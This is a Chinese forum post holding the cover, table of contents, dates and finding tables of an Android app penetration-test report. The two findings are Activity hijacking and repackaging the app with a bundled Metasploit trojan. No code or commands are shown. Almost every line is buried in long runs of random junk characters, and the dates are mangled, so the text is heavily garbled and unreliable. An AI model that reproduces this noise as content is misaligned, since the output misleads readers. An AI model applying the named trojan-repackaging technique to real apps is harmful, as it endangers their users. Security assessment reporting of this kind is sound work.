找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4404|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
0 v+ n2 i5 L% |: ]7 C, x' |+ U* E+ M0 |/ G( Q

2 |8 ~$ u" U1 V6 W$ r# I6 _+ C/ K2 K: }3 Z2 P
+ ^$ L+ l) i. Y. `" [+ a6 K ; \* ^4 D8 Q4 j1 Q- }$ a& Y7 e

6 z% b2 \) A' I" S* c3 Z) ?9 I) v) e4 m
: m* N" i* X$ M1 N* i5 o! q6 A4 r! S

1 }* D( s. A. S7 g: Z: D ' F/ T% |0 I. h) s2 N 文档编号:                2 l: u9 V, b/ I5 P& L 8 \, ]8 j+ N _& ?

1 L3 C# W8 N1 X4 j( r- u . w% p% o) _7 a

* O% P, n, F- i( K4 d / V' a$ }1 A, |2 X3 g6 g   $ t! |% m+ N7 {9 N" m! J * |; t/ {3 W4 d% m/ a# D8 s Q) E

3 Y! Z% [7 D* c. @ : f: k1 T6 O4 n; I5 B/ f7 }' W

( D. Y% `; ]; d a3 T / D4 b9 \( Q9 U   5 w6 @ z0 {+ j8 i. E/ G+ g4 E! S& z0 v, Z, |% a; H

; U1 _# j/ A" g3 e5 ^( b. h 9 f3 \; P* z$ G; O

" L0 o/ i2 u% N# J5 [0 T1 x) H% n ~( B+ P2 a7 Z& J   ' h, |% c0 E+ \. |( J1 J& Y 3 m$ c: q4 k& L, w$ |0 [

; j' q" K* W* @9 S* j* n! | r; w - v- M1 x; b, R2 ^9 h! u* M! ]

8 j6 L3 w& o2 w1 p- s; I# ^2 d3 t% {( A- c1 X   ' W9 R7 v- m% q0 V- i 4 B8 `! Q* {# L4 g

! I: t/ [ V: m2 ]4 A- d9 M 1 s" [ h$ z0 S9 K7 R" H

" s$ `7 ~/ F( A6 I! Q4 ?8 G) m ( |% l) e0 O2 A. I9 Q   8 I' j' U4 |+ ]6 K0 t. c 7 a$ _6 U# T g u S( b3 g% `

4 [( \* {" Y3 I* ^" ~5 |. D) n a# W f$ H

* J0 G# V/ X( H, n- n0 z! D" S* `; |$ L7 B8 ?5 p$ J8 ?' R4 x 某某某APP渗透测试 0 _0 d% N' V3 Q/ S! { 9 Z: k+ J. n; \. g5 T9 Q

( c9 X0 F A5 b$ O- I9 Q: F 1 ^9 t' [$ L8 P* O, J1 d

6 ^. n/ x( G4 I* l9 k3 m" U7 U' t' L1 r; X   ) M" W% |4 p1 o9 W Q* o) K) b9 S4 d

6 [1 ~: V$ v' {( h- W- D) t& h+ N) _1 u8 J4 r, A

$ e6 `4 Z3 L6 @# s. U9 Z . l; i' u8 w J$ p; |   7 i+ R0 Y6 V8 y, `8 J$ D 4 {/ c. D H" N! F

! V8 g7 b# X( Y, K' s: F: h0 A$ g! U, A( c

8 ^. o4 y0 p9 ~ . q! K5 B& P! P/ `; `9 s   , y. \+ L p8 L3 {: C2 j6 O; T, M4 |& s& U" q+ J. K

; b8 Z+ S8 ]9 U8 Q 6 G' T# R* J! U( `

, u& O( Y4 ~# @7 @# R8 w5 S / j# c7 d x# v! i0 u) ?   " |: x8 l/ N0 x0 G5 j $ K8 r0 X \6 J1 D" P

7 E( v% ?! p0 u) S4 Q o1 T3 _5 g+ p) q" R+ n% p

! O. v) w$ O- ] - n- _# b- c: s J( G9 J 技 术 报 告 : u4 X' v, U' x" [; R 0 }; }( W5 Q2 E7 Y; Y; _( g

2 v7 D9 q& I# w# S( a + K* f" `) V- b* D

, e& Y/ @/ n* ]: p2 R: q: W * @1 T7 J T3 N- l! T   ; }- d" X7 b; e ; L' `0 u0 w+ q2 t. \! O8 ~4 ~

) [; T; k- L z: t( \1 J: d / P8 O9 A3 f. e6 ^% M, E, F

( P( ^" o4 o: Y3 s1 m! X. x + Y; W( x7 c9 |% j4 C   & J& q# |' E+ h . G+ [' m0 d1 ^2 [6 j4 ^

" ~- m. M* o/ W3 L3 T, o, h6 B9 v ' K. ]) G2 H+ _% M8 I

. _9 V2 `9 S" j6 }0 r) M 7 c/ B+ I' J- {/ C' ?   1 Y$ B3 ]) s+ g" c( T" P7 L, ~' w0 D: o- Y# W& i

6 }8 ~! ~/ ^1 C& K * g9 ]; _" E% B- ^+ |

! p& i0 M1 a c: [8 e! T# }: U ) p; A: d) {! [' I   3 z1 m6 K2 ~, q3 |5 |8 F4 L1 Q- |1 G+ t$ x

7 @1 w. ]/ ~0 ~# ^0 h2 ^# ?) m- W! m9 h* Q/ u' i5 E2 K! V! O- V$ E! E

3 @6 x0 d: G. b$ O% u ! R7 \- L( N. X3 t9 v4 h   + ?( N; m! R, u G7 l) p6 r ' Y( u$ y! z: o; Y9 c

+ J% I! {4 R4 p, V 6 D. S8 ~$ f3 u. n

7 |* V0 {; l: z8 o" p: M - ^" ]5 H) x! ?6 H   " f* B X" O+ \9 n3 p / Z4 X5 T8 r8 p( G$ b8 {

- `% N8 X. c( ]7 K 6 B7 ?' R; k, N) L! O% {7 F

2 n8 v3 N4 i. l1 {: T1 @, K5 j 1 x$ J# k5 G* b9 E   & q2 D* ^6 N& D) }+ K Q & C& Z, ^3 m' q+ @1 B( \$ H9 \6 O

* W4 Q2 w. K0 w$ ]/ E. W 6 { }2 b& H! X, Y( E1 O+ Y* ?! }

* n# u( e: H- c2 Q- b : w9 x0 c5 ~- j# Z   1 U4 H& P4 r# h: B* ]: w J i# E7 a! E6 f" R U

8 W8 {4 [; q4 A# V( P 5 `2 V5 W) R. R9 x! @4 X

) L) ~8 U9 [: B, h5 D6 O ( z; I1 v: E2 G7 q: l   h6 g! @+ @& ^- T ( C+ e# S1 _# e( \

! Q' e) f v/ m8 } * w. U) r5 q) Q% v: }# W# p

" e0 i3 P' V% z( z: k$ p, I1 J: H5 n0 _/ K4 U4 O- u j   ) ]" d* Y& U" z+ F1 a . [( x. e5 X5 @' C/ z6 W9 w

7 B- S* ^/ x/ {% D3 N* S0 F 6 X v9 O# a8 b- u" P/ D' M

1 W3 \0 r h# k9 T : k B! U1 @9 R$ C9 U+ G6 m' q   , K* ]7 r, C7 ?( P" g9 F; S' `2 u) P

. R9 ~$ p. _4 b5 o9 ?# D+ S8 I 0 N' r; K7 y7 J* H

R Z% z- ]. R& n* _: N 4 q8 S8 i3 ~; T8 r   ; t# a* J- N" G# }7 B: q: g. }4 C3 z9 a: K6 B) V

" p1 B& u G( c 9 o/ ]- ~% W* T6 g4 ^: Q4 ~* V0 M5 J

9 w. C6 l4 F" f O) J; w+ T% q- E+ L1 T! ~ Y' z   ' f; t* C5 A- v2 v: L6 f " O" k2 w& y" Q; A# k: v

/ z) E, e- _3 y' c 7 |% N( l$ P4 g3 W) q

. x. e$ h( Y, v& N; p( w$ Q: v/ K3 O: }/ e# ^$ J& h" T2 A   # l" a! J/ F! j" s( L7 `% x : D% Q" l/ \, O

! N/ s7 s6 }# x2 D0 C. r' Y$ | \

8 y& e$ y, h3 O6 Q% @9 a; B Y2 j0 `, S" c4 d* i7 R   ' A' v6 j% L' I/ ]% T ; s. Q4 \3 q- h; r6 F; h4 E0 b, F

$ D0 q, s/ _1 \0 h. S" L 2 Q( [" q) o! e* A3 ?4 J

1 z# d1 {) u& h. G- C) I) G+ q- u& Q3 A; `# x4 D7 T9 x. C   - i$ v, g7 Y3 ^9 Q& x" l* ~ 4 T0 Z+ a6 @; |: g

$ k- \. c; I8 W& |) P% P) A) s0 y7 g+ S- A' a% N5 O

M/ V% O5 }3 g; G3 d- s8 L # y' C9 V4 T# K# W* Z) C   0 N0 I" H) G! V- R. ]0 _ # u) f5 ~# }9 D% |2 x

2 a+ `% {+ H7 i 7 h! U- N( a( v9 J8 L+ Z

9 f3 ] z) c$ D! q; [0 \6 r6 U8 p6 [0 t: T b& I   # \+ [7 r$ b$ F/ z: \5 _ / u& I" |2 p5 x

& _) `5 } ^2 R4 I9 A: V2 o7 c( W; f' y8 k( M" ]/ M

3 J" \1 R# E+ g* Y9 S 3 t5 |2 K# l' l0 f& @ 二〇二〇年 9 ~+ Z& H5 r7 {4 o6 Z, p; Q ) z5 z0 d- t$ \3 Q# _

, e6 i; ]$ a6 X! i q 5 e6 ^7 ^* ~! \ d2 J# Z: n2 J
: x: _9 z% V9 }; N; i8 ? # g U+ l% n, d4 c
4 s& @" `. T1 ?6 o# P0 R3 ~+ P; N+ i, n8 Z. v a0 S1 V( @+ P( V' t: d. c4 I& U/ \3 D1 _% O0 g' h+ h
) I; {1 n! c6 P* U0 J6 a; W 9 z) H, @9 l9 \) J D- V; H7 Q
8 M9 m4 ^1 f/ w/ b 0 c9 F6 }4 _6 q9 X0 W6 _) v- ]
4 U3 j' A7 T' _: N 0 ?/ I0 J; n: o. q( D 1 V1 t" d" f6 ]9 H/ {6 f0 j * ]4 U9 z! b* @7 C2 I4 B
. d& a& J1 R+ D1 }0 Y1 p! u' H : q/ W+ S7 G( o7 k/ T6 d

6 U& q6 {% c/ @# P! u' ]! j % ?$ \" M3 B% _( {. Z/ J6 ~ 目 录 + {0 P1 X8 f$ P# O$ ] " w; k3 q; {' @6 Q: r& L

. y& t0 \( o/ I V5 K5 V5 k6 r/ o3 X' a4 D% r 2 \, G/ N1 i1 M8 W1 M/ R6 M' I % F" B. q0 T, t) v1 m4 a

. y- x* D' z0 f- f0 u9 h1 p1 w+ I9 v8 [, G2 S% u   " F" L F* ]% L" m% J2 M & q0 q8 r( t% T% f

8 {6 q7 B5 J+ w$ X4 y" m : d0 X0 G2 W5 }5 I' r

6 O0 _- M7 j- d: U' j+ H: S : L9 J& I" L# I' K, x+ b0 F 1 概述... 3 1 v' @( K; Y7 W - U% C: `* Y, m& |. w5 i

. s) ^! j4 M$ j + B+ E$ @5 l0 e3 f3 j; X

- L I$ u- Q- _' t ) }- A: [9 D+ P3 v, g7 F! Q# l4 ] 1.2测试时间... 3 : y3 _0 N& q! u+ G. C1 T $ ]+ H. ~' P, [3 g( r

4 |/ Y A- v, R4 Q1 A7 n) D! W$ k ( u" ^2 }/ A6 G6 n9 g

' ~; O! P4 P6 H R e7 A8 F, _, E; \# s) s4 y 1.3测试对象... 3 " V ^1 R7 a& `6 Y, t | : Z8 T2 x& T a5 N0 X. B. F8 ?

0 d( R) @! J _: s0 o+ s# d& T# V6 Z0 D& [" u! n1 G" N

# N: {# K# S7 f$ q+ | 1 d; Y! n7 @6 Q$ ~5 J/ t 1.4测试结果... 3 - K1 \" s% n% ~2 I; j " q: d6 h& D9 Q8 P7 m( k

2 [# w2 _- l1 U; } 2 V- b- f; Z& E9 A. s0 `0 \( [& A' O

1 X. L+ n# P1 h! C 3 D. {) D% c! s1 g3 Z4 c- n8 Q 2 检测结果... 4 ) v/ \9 i/ c. w ' O$ A6 G! z5 X0 d$ V0 f: P

* C7 K4 g: k4 O. _; Z& c2 ^6 A( S6 U/ O: d" [0 z4 c8 x4 Z

8 `' r: v9 N) c& @4 x. _ $ f5 u) d' L& B3 y 2.1 某某某... 4 - J0 D1 A6 A4 } % w; ^& S, L5 }

- ~! B5 {5 J: i8 M8 P ; W1 s8 W% d: U$ P

; l1 C! i. W4 Z) ?. |# O/ f1 a$ [, t 4 p% n' i8 i2 y& |- O8 J# T% H! H 2.1.1检测目标... 4 3 A- Z3 b$ S' A& z% l- P $ S# P5 O/ ? @6 X; L3 C* s

- ^' J6 D; R9 B- F! F: L% Z- ~: [; V c9 C. A, _* U" ?6 }

# E9 s/ m2 l, ~( Q" G7 U" h 7 L* n; g2 ?: r9 p% t 2.1.2检测结果... 4 " _% e/ `# `! u6 K8 F- y& j- I7 z9 ?9 o7 p

2 K4 J5 j/ e$ @5 ~ " U Z0 z( `! }/ ~" _' i

' }% g! ]) x# |; g& c( ] # E" E# a5 k/ i/ V 2.1.2.1. 4 9 _ ^; d$ T% W$ v6 E1 R" U+ n: |9 ~& |/ [* [# u

( n, K- P6 N8 Y; {( e/ _. ~0 R" x7 T$ S3 \: z& F* M, i

& c1 v$ d' @5 p8 U+ D2 Z) Y: g7 c8 }' K 2.1.2.2. 6 # z$ F! y u' x 4 D2 L) O8 }0 ^) C4 ^

5 [7 z! M5 F- ?& W 4 h* `! [+ @" a

: L( v7 Q2 A2 Y1 L/ @, w+ P# V9 Z$ { 5 q& R3 c" ^+ k! m+ ~" y; }0 |, B8 v6 j$ c2 G

. G% Y. B" {+ L# Y9 C2 i, R# K' ~ : P& B% R$ c' {/ j1 ~# ] ) C& t; \% C2 [4 B/ X1 i
7 r% v; x. X+ p- n , W. g' n6 P$ ^/ [3 ^
( Z' t5 a1 W; l8 i* M* g 6 D4 k8 s) R! t9 R8 g& O% p $ O3 H' c: w' r# s; S, [8 Y 9 w( h. w2 [# d6 P: `' ?$ W

) X1 Q1 k& \/ b& W: R( @, ?$ U# k1 t9 T/ n, L 1 概述 $ S, C8 g( Y9 D/ z* b- E5 l$ } w U" @) x' t. @+ E2 y5 q

+ _& y! O* x; k# U# p X% Z ! z* u5 A# F4 O7 c8 i7 x4 g

+ `. X W- m- n* {( G6 _6 Q2 Q- Y- D% U+ S% w/ ^ 1.2测试时间 , j3 Z7 N" A# B4 y x" B* l* _* L " n6 G7 D5 ~6 ~

; x3 @; w# E, }8 K! p 4 v$ U. q' F' R 1 ]9 e7 H" k$ h A/ _" X* e0 A$ F v) p0 Q: M1 |5 M ?. ] F" i" [7 X& \1 r3 `, `6 M$ d% P. B% X9 v* K) o4 q2 o R# j2 E1 A0 | i, s2 ]4 y9 T: I. \5 \ w6 `) u# \- i5 k$ I5 n9 B1 o5 J& t# g( f7 U8 N4 M. K+ E8 W7 W4 B% @: Q) {) r! b" N/ J; s: K6 G; t- t; T9 I1 {9 [! E7 h$ Y% N. F. w f) z1 R+ H: a/ }6 ~ t" }1 B1 m: A9 u5 i3 L, P5 ]- J/ R. K/ F6 u& r- T' M0 Z" c* O/ U) f+ V" n% y; i2 N4 w4 M0 D: O7 o4 T5 h0 z# j9 g) H1 ?% k& N* A$ u1 |& _ k! a( O0 t8 Q# A$ y$ j3 n$ l7 P: l- _; I% h& G# I9 }1 y$ ^ ^1 b2 ~& A1 T% l9 s2 C& B6 b6 @2 j9 a; \, [/ T* j( Q# N `. w/ Y7 w2 }% X3 o: r, k' p% {) p3 A- g+ ^. ]: |3 \0 K9 z* a$ h7 |) P/ d% ~+ d: W3 `9 E* N9 b0 |+ V7 H! F3 l3 X) A& K4 w8 J
+ g4 J' m. R9 c$ m( ~4 B 2 j+ d) v" G4 ^2 o- \. n, y

' }( U+ Y) ~& I2 B$ b$ N. ? : N3 \* G/ z/ Z6 C 渗透测试时间 . D4 z e; N% n+ a" A; k( p8 F; D n* h0 R" a. c- v

, p2 L1 O. f( k* a. h' w% J, e" `' ~" B6 [
. Q4 s! J( X* P! r1 C; D ' k W5 B% _7 A4 a: s, ?! }

& d% R0 i: S- P$ _ $ U% D5 v4 g# I3 r 起始时间 , q; S" m% \( g# e7 {; _( c% E- C" j . q( j$ X4 r3 M) ~0 Z

/ Q( \/ M& Z/ |: b+ @2 }4 _! g! Y+ t4 v/ p 		+ i; \! g/ l, @. J5 d+ d! J( `( S % f f: Z8 R D, m

5 }6 ~1 R# `4 q7 y/ D/ ^) M# {2 X ' ]: v! i; o, x1 x9 ? 202046 ) ?" m0 [. J- ~# S( N6 O: l& t( p/ M

, s+ N- L" v# W( r9 [ # Y1 P F2 c7 w7 ~2 V( L
8 I& w& n0 Y4 {# l# X% ` : ?3 F$ g# ^7 e* ~6 G: k6 P8 T

8 ]; @; Y$ L. K* I 8 t+ P1 z' D, j( ~* J+ b5 h 结束时间 9 L0 _8 X T. ~) L0 o0 g( K' S9 d6 `, J6 y3 }5 `, J7 I2 X

" x" g- a* i$ M8 _* A& \/ ^. K+ x. G2 L s 		F0 }* C1 U6 s$ ? % L3 p M/ n" Z2 X9 s% v3 s

3 b) Q v% G7 L' L. J$ s2 ^ ' u. P) ?: P5 @* ~ 202049 . y1 l" ^+ I- v( m8 T& z1 C0 f9 d& p1 o* |% ^3 Z

G# p. v; `" Z+ f$ A E# l, z ) d2 v; x4 W- f0 `; H
/ }! m/ E- B% r7 W$ s. P; [3 x# ~

7 X/ O! [6 r: R! U 7 K3 r6 Q( m7 C. G1 r- j 1.3测试对象 9 p* U7 \5 [$ C8 U7 g; V% K* `! J1 b9 s

6 N' ? { ], ]( f/ j d1 u! p" H2 ]" ?' y! s* L4 O

, f( v T( m3 l9 Z8 P' u8 [+ F/ g! y Y" G+ k* U 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: * V# E1 A. U" ~8 b4 z 6 T+ S) x* ]' V

/ K3 |) A: w$ g# i ' o+ Q" Y! t+ I8 O7 l7 R6 j3 F! u

z( x8 l; d3 q5 _9 x 3 R5 ?& e) K! j6 z8 v9 l 1-1 检测对象 5 Z; F0 y E$ y ( h$ f7 \3 D" l1 D9 E! l. {

( { H3 x2 I. G. W% ^! }2 o% O: U s/ s R# ~/ Q E. p v' i1 Z ' U: R1 p" Q k0 U# \2 e! F" S2 L4 [, c$ t- ?5 i" ^( Q& F$ i7 ?& ^( d* ]0 j. e! j! p c" P. O5 y4 `" I3 b% b F" P0 V* ^; i6 P, E2 a+ h8 F: L" N4 W1 i# [. D% J$ f1 S1 r' [0 M, t& r, k4 G8 B- u' @7 c- d) I# n- K1 g. e4 C$ e* H: T$ B* ]1 z% j5 v: Y, |9 g* K; C2 c3 |/ |6 K# [2 \, G" d c4 D/ ]& o( W: o3 W, Y3 |: f( [/ `) r7 s4 g9 ~+ ~3 j6 u- c! m7 J. M5 k) G* l, `6 q4 P( s+ W% z$ z; w7 p& ?1 ]0 s0 _* I; x. L- P4 i3 ~& S) x) }, e! t# g/ ^) U; n: z+ V( g% @" E5 o6 W! b: S8 m$ T7 M& Q: t _5 |) i7 @2 R# v. q u# R! M; ?; B! X! u3 M2 k! I; Z: w. _( v3 K) c6 h; c, x* Z$ J+ G; P- }4 r4 h: h5 W8 c5 K9 C9 V, Y* y7 Q9 ^$ {! b. [+ n) ?' }9 H% T8 G E1 M. Q# N! S/ ~/ E" n, @/ R. p" Y z/ S: C9 r; z) s- V3 ]+ U& a+ L, p+ `# A/ w) q
6 Q: T, E+ k+ r" n" z6 E + T0 A5 F4 u" \' L( _2 X

3 c# t8 y) I; \7 g5 z8 Y. E8 y* {% j+ j 序号 9 ^7 \8 w$ X& s& z ) a/ Y1 h6 {7 {; W- @, p$ J$ B) ~

2 @$ G! d6 \2 s! P- v( j7 f5 a % y- K# ^9 H8 }7 z0 p2 d% h 		9 e* ~4 ]6 w2 Z& t0 Z - o, o' T1 t( K, ^4 ]6 g

9 c9 u- i$ F* I; U& L4 X: b; o: Q+ [8 S5 ]9 F3 A 测试对象 6 |; C0 |1 x% Y! B$ @; W5 ^0 l! e& i

/ ~( w, K- b! l ( J8 o2 t) g: S' A" a* V* I+ D 		. {4 W: t2 @2 }5 q& e7 ?: z' c+ w/ F , k. C) G) |/ H$ r

( J5 N7 k' L5 ?9 \- P5 d& q * v" b! m4 w7 U6 U, M) y 测试地址 2 A: m. u2 u( ?+ ~1 x; `. z+ p& V

; }4 R- P1 } r+ i/ D # [. R, A, g) S% z. y! ] 		2 Y( G; K7 w/ J6 F% m. I0 Z" Z& P I% F" d: v

1 ]' j; h; ^7 X. `( ]& p6 U9 V! p: { 安全漏洞 6 O2 V/ B( B l8 g3 j4 e! [ $ G$ j& D2 s* y. i; `5 o9 a

x1 ? P3 h# b+ Q) C! s8 J& G % r8 |5 m6 _8 N# q1 t! g
# c9 Y, F, w# M* P8 X) v9 w : s* W' ~$ Z6 ~5 L

" j* W1 ^+ g* E: Z: l , E0 _. X6 N" Q 1 $ m0 R- o# q, e! H& W, J8 }4 b/ o* B, p9 _4 F2 X

4 i0 O ~$ X+ g& j5 h ! E9 p$ }$ k5 [+ p( b3 g* W" k 		4 ?( `0 y8 N- e; u* q9 }& U9 x5 f: `( B1 @4 u5 j6 D+ a7 N6 D" f* [% q+ X- U7 \+ f

* H: }6 `5 P( x5 V + b! Y# c5 c% H: j; J 某某某安卓APP ; o7 S% j, w; Y: ^; N( P$ x7 }' ` ( T; l+ r. ~7 h5 Q. w- E

* A: C! f, r: _8 f1 O8 b3 \ - ?. U% ?0 t* r" u 		0 H @4 Q: y1 m" U ; _/ g$ P$ g) L

l2 d5 _- M3 [5 {: m , _7 g! Y0 b6 w0 J' s' t   + I9 ]5 M* L* e ) a1 p8 \7 I! f( ]* F& c" j( C

" f* ?3 b- A- n' |* Z 9 f; W; `/ ?/ L9 e5 w- u X1 g 		2 W+ [1 W+ }3 L/ r! Q; Y& y, G' y7 v, P. k/ @

6 R! Q# f- E: P4 O & T5 f6 U& m2 }" c+ U/ o 2 ; \( {5 t4 V* J9 N9 Q: R # y& _) E9 J; A* ?

: _& y( j# T& C; ^ : C, u* I) r& z* H0 `
! N0 {# m! |3 ]& h9 ]/ q6 p5 b( m% O

1 R1 W& {1 M! k- j " s/ E- r! f# T: K. |$ D 1.4测试结果 ! k L& w$ q. v9 m( Y& }7 `2 A! s' F5 E1 i, y

$ h! `3 g* v4 f' T' r ' D! y; Z2 B9 x

$ P, ?8 s2 V9 B/ d7 W # [1 J3 U* }8 D7 t. U8 v3 U- `& B 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: , o1 m! M/ y* N5 s # K4 {/ l, i* s: g3 K- t3 b6 d

; t3 w* n; J8 ?; c1 Z, r, w3 F- \5 [0 g; q" F* A

4 Z+ I) j; }7 i! V; D) R; J Z * u; I# C5 N3 P- w4 d# M6 c   6 D e! k7 J# @* j: y * o9 ?0 b" }% \9 @" u' |( Z% X

! X4 x6 y$ k* L+ {6 n4 \& p7 `; |2 ?& O3 T5 R& O1 Q
7 V9 i$ a+ C4 m/ F9 S' {- z ! |: I4 c' I- n7 e% M) \ : j! C, J8 { h2 _, A/ ^/ ~" V, o4 A* t* E5 D+ e q7 n6 |6 S6 L5 ^9 d/ u& N% z. k% \2 G+ g; H9 g6 e) T8 w T( V2 b' }% a. y3 Y# f, }$ J! z: v7 b5 c; [+ M I7 ~) W W0 o2 ^. a7 y5 ^6 e I5 z% }4 ~$ M1 i; c8 x( k) }3 L* F5 _2 }) H; g) n# T! F4 _$ Y N! |! @+ n$ q5 H! u/ a- q& D3 c; v4 U4 g' i. m* v) V) J) m# O6 V2 I' S Y9 K3 D7 s) [( L1 n4 V" g' c2 n$ B6 O4 Z. ~) z9 Z8 M) [2 m6 V/ _* p' M5 H% [4 c2 k9 n+ ~% m4 U, F/ e6 n3 j5 L0 v& c3 y: N9 x6 l( D# W+ w: t9 b. M8 K; ^; o+ j$ O4 Q0 r4 T) t' U2 X$ c$ E0 m+ h5 N4 [6 q$ A( T; `7 y' O6 {' z: v9 O" W; D$ T5 ^ V9 a- U: O7 z; @+ X+ n6 t( F0 k( P/ l& k, z& }4 Y. W$ U) ~! ]1 L8 O w' C4 T9 r$ {7 v4 f1 \% {/ E7 a% r! } {; w$ U' x- p% j* g+ ?2 S* D: s) B: l* ]( O1 R2 ?. H1 ]' g1 z9 Y: k5 S R8 {0 F* p7 s6 G4 C- Y! _0 d; o3 v, r. s# y0 e& ^' k5 H) T& }' Z/ [7 \, ~+ E- }4 ]6 v1 l7 U0 k$ v. n7 V$ N) J+ k- \, N4 t. t3 ]6 s7 ~# Q# p5 m6 M4 o; d; ^( i, L. g: M7 Q1 A4 _# M& l, E* I3 ~7 ?! `1 G+ R+ H( G( ]) [/ E+ h* w/ p( f5 c- ^! P" F% E- r7 h8 y5 i4 ~: C1 ` i/ V. w1 E1 A7 H J8 r* J2 }" ?, }. u( W% h3 G* ~5 n- t: f: G, B2 z* J8 N9 u0 L3 f3 z# b$ [# I6 H% I- T9 U" n9 p
, j$ e4 N K! B; v7 l6 f % i% o1 ~- H) l& j* k: ~+ L

; ?% y; R+ M& n$ F7 M 0 J* b+ s9 t' E. E( z 序号 5 |% x9 q# s7 I- n, N - X6 }' A; ?. S; X' I

( f% }% a4 E0 d/ _( C : Y! b- C% Y: E7 e. R, u9 w 		' E9 a) u/ g3 l# i% F2 N# M R7 w& N+ O

8 P( x, p" `- r- E2 R) [; G / f# A _# q! _% _! z( g 系统名称 # | \4 P1 n, Q" k" U. U$ ~ 2 e/ w) x. f! ?; e$ }

9 P+ g! [! X+ L% C' H $ {$ [+ K- M7 [& Z2 z' G 		9 R! S1 y+ Q# d5 a5 p 0 ?6 K- M' e S2 L7 s& y

f" R8 P' o/ X7 O " O' I0 K) B {5 I0 [6 U 漏洞名称 ) l: z: b2 v7 f% i- N $ X1 U. v. Q% s) m! K# \* o

6 P8 g; d) w& X$ O 9 k! \' k6 w2 {* ?* N2 Z 		' _2 _6 X, \+ V/ f% C, Y' Q 4 O4 ]6 o- P0 x+ d' e* u

+ G( o m# P2 E & b) O! Z) ?' N+ o( k8 } g+ g% P 漏洞危害 % N9 T6 C7 _" y# g * Y% V/ Z. v: d% l3 _% J, D4 R- {

' p/ H$ |1 [% P4 P5 O- S: ` ) f8 N& Z3 w* ~. t 		! q* P) o% s% b" Z- |! X4 R- X ( _9 ?3 w6 ]% Q7 T/ \* C/ N

( O8 J3 p4 G! `5 s' t) _2 l, r/ K, E( K! i& F 修复结果 1 P+ l. K9 w7 X u( ?* }! C ; l7 |6 k4 D; f# c7 C4 c

+ K$ }# z$ q U3 T! o. ^' r5 q. E% t7 J2 y1 m* o8 |
4 S4 y0 \0 f& u( C! S( m. L: Q * }' n0 @& Y/ O! T+ N' A

2 V! |" w9 s2 [$ z" K0 I1 L* v- i% ]" Q 1 2 Z: {+ m F) l) a' t8 K ) V) C$ B9 F# ^" @# j# l( k

# ?/ \" t8 ?& m; c 1 z& y) L& d/ a4 D 		4 ~$ r2 g$ H, G7 s r: @8 g ; {* G- l% a# a# U

( a1 {5 L8 D4 M8 p 9 H9 E8 ?- g! k6 s 某某某某某某APP 1 I& y1 p+ g. g& Z( W2 p t, X* k4 h- f. H) C

- ~) d0 W( t- a- v * Z0 O$ Q' y8 q- z) f q( y 		4 _2 K7 B0 ]( ^ * F& u) R& s4 v/ s( X1 _6 R

+ R: F. c* M: h/ w. |( T1 o+ y# @- f$ E+ v$ ?9 R Activity 劫持 ( g0 t: y g8 Y) E( X5 _ . L. I) S8 y, f' f8 u2 R

8 J# {7 d0 q7 ]: g, B5 w* F7 |6 o* C1 ^* A* c$ i; G; t

0 [8 Q1 ~2 `" P. `. ^ . ~) [8 L2 K: a% ^   , ^* N9 N9 Y3 W2 W7 J6 ` $ D/ Y5 |/ t/ D) f2 C2 i/ ]

3 u4 _9 ^' L5 T' X) z+ A . K# R/ l& {. t( `: T 		1 \" a! m. ]2 t; d7 z; z 3 I0 G# J$ |1 b$ g1 x7 X

^% J: V! p" w6 o! |) }6 w% H( a. f9 ~) g( u E) C J: {7 M4 q7 H2 y* g" R- s # @$ U* y$ E I Q- z

/ ]$ d. n+ M' f6 v$ @4 r" h0 r$ O, ?& d& I8 D' C 		& _& m, A+ i. p; U5 e( I$ ^' r! d

3 | a5 q' d9 t5 F7 v 8 c& _$ @. X" C   ! y2 u/ K+ [9 K. m/ a. m+ A0 X$ o# K1 R8 N) L7 u

0 \0 f b* Q# s; |" `3 u' D4 K5 [ $ W1 H# E' w* X: d4 N' G
: ~) D1 z* z7 s( J9 k3 b2 v% z: O! P* o& O! r0 Q% j' i2 E$ @5 b; j

/ ]; J) W/ n9 `0 j5 }' n ( c9 A- c3 G' {5 l3 @; @0 j- Q 2 ! d% N |/ f" Y" G4 C+ Q1 U " k5 H: o# A) l V5 \5 V% t

: V- G# {: R( d! w9 z2 B2 C; F7 E2 }, d% T3 x 		& K3 U& d8 S- L% F , J v5 e" N6 C2 t$ o

/ Z/ ?, m: K I & s: N3 N. F& k 某某某某某某APP 4 Y5 _% @1 Z7 y1 i; i ( e& G- p& F& u$ E

, b6 A4 q# V2 ?& W" ]# v2 r% k + B3 A; I8 l; _6 w, t3 H: T 		, g7 n$ q# n2 t* W" |, R- @; v. B! E8 s& V

+ e% U2 K$ S% t3 P0 ` ?5 u/ B' O ( J8 B: n6 c9 T 反编译二次打包捆绑木马、篡改APP代码 ( B2 o; H2 e8 V! T' K2 d; u" D- l, J4 ^. o( R% k9 Z) ^

! W( F) g8 M) Z3 G* E- |' B ) @0 ?" n/ b! b2 z2 E 		7 _& z6 p) w8 s; H* i4 O' I& k$ y- K9 T2 w0 P" V

; c9 n* G: B' b3 [/ ^; t * f6 ^2 t, R# [4 ~) L& b- t 3 T4 M1 I |) v0 ^/ `8 x 3 z+ o: e* @$ S/ w, p! M

1 i% R1 b& Y5 q, B; |1 B7 P7 e) L$ l8 L" _8 O( P 		! V6 g, p t" F" o" P4 Q$ c & R5 r3 \; {4 D- _2 h

5 x6 `- Z5 `! H8 [ $ l" t: _8 U8 {; e& O   / K: K( ~7 }7 U8 `# c' A! q8 x- r4 P0 g( j# V

+ Q" l7 }8 n6 X5 [2 c* o _6 T! i- J4 C8 a4 S4 j" s
# Q6 A' c" d! e& b: T 7 S! e$ S% M: G$ V
" N, u) r1 _' ?0 H1 p$ y, v 5 N% w: k5 H/ M

: g! ]1 `2 [% f" A, C9 P- [8 s 3 c1 N6 }3 ~( H7 P! z4 U) A   5 F8 @( G0 G: } T' \* b+ B+ t 0 d& W' L/ `' g' S

v& R( g% O3 I4 z8 H, ^ + E2 P \& C5 R7 @

